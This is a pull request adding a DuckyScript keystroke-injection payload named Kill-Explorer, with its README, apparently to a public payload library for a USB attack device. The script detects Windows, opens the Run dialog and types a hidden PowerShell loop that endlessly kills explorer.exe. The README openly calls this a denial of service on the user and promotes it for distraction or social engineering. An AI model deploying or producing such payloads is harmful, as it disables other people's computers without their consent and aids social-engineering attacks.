### PR TITLE
Create Kill-Explorer.txt

### DIFF
--- a/payloads/library/execution/Kill-Explorer/Kill-Explorer.txt
+++ b/payloads/library/execution/Kill-Explorer/Kill-Explorer.txt
@@ -1,0 +1,54 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM_BLOCK
+Title: Kill-Explorer
+Version 1.0
+Target: Windows 10, 11
+Author: Nate
+Brief Description: Kill the explorer process repeatedly causing loss of Windows Desktop functionality.
+END_REM
+
+GUI r
+DELAY 500
+STRINGLN powershell /w 1 while($true){kill -name explorer}

--- a/payloads/library/execution/Kill-Explorer/README.md
+++ b/payloads/library/execution/Kill-Explorer/README.md
@@ -1,0 +1,11 @@
+# Kill-Explorer
+A ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user.
+## Configuration
+1. Execute on windows 10 or Windows 11.
+2. Logoff or restart to reset your windows session.
+## Notes
+A great tool for distractions or social engineering.
+## Windows Command (used in payload)
+```Powershell
+powershell /w 1 while($true){kill -name explorer}
+```


### PR DESCRIPTION
A ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user. 
Configuration
1. Execute on windows 10 or Windows 11.
2. Logoff or restart to reset your windows session.
## Notes
A great tool for distractions or social engineering.